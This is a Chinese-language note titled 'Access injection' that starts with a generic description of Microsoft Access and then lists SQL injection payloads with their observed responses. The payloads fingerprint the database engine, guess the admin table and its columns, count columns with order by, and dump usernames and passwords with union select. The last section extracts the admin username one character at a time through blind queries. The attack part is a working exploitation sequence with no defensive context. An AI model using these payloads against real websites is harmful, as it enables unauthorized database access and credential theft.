access 注入

Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点，是 Microsoft Office 的系统程序之一。

Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软OFFICE的一个成员, 在包括专业版和更高版本的office版本里面被单独出售。2012年12月4日,最新的微软Office Access 2013在微软Office 2013里发布,微软Office Access 2010 是前一个版本。

MS ACCESS以它自己的格式将数据存储在基于Access Jet的数据库引擎里。它还可以直接导入或者链接数据(这些数据存储在其他应用程序和数据库)。
MicrosoftAccess在很多地方得到广泛使用，例如小型企业，大公司的部门。

Access的用途体现在两个方面：

一、用来进行数据分析：access有强大的数据处理、统计分析能力，利用access的查询功能，可以方便地进行各类汇总、平均等统计。并可灵活设置统计的条件。比如在统计分析上万条记录、十几万条记录及以上的数据时速度快且操作方便，这一点是Excel无法与之相比的。这一点体现在：会用access，提高了工作效率和工作能力。

and (select count(*) from msysobjects)>0 （返回权限不足access数据库）

and (select count(*) from sysobjects)>0 （返回正常则为MSSQL数据库）

and 1=1  正常
and 1=2  无回显

 and exists(select * from admin)

and exists(select admin from admin)      无回显
and exists(select id from admin)         正常
and exists(select username from admin)   正常
and exists(select password from admin)   失败
and exists(select passwd from admin)     正常

order by 10 无回显
order by 5   无回显
order by 4   回显

 union select 1,2,3,4 from admin

union select 1,username,passwd,4 from admin

and (select len(username)from admin)>10 无回显
and (select len(username)from admin)>5 无回显
and (select len(username)from admin)>4 正常
and (select len(username)from admin)=4 正常

and (select top 1 asc(mid(username,1,1)) from Admin)=109  正常
and (select top 1 asc(mid(username,2,1)) from Admin)=111 正常
and (select top 1 asc(mid(username,3,1)) from Admin)=107 正常
and (select top 1 asc(mid(username,4,1)) from Admin)=101 正常
and (select top 1 asc(mid(username,4,1)) from Admin)=101 正常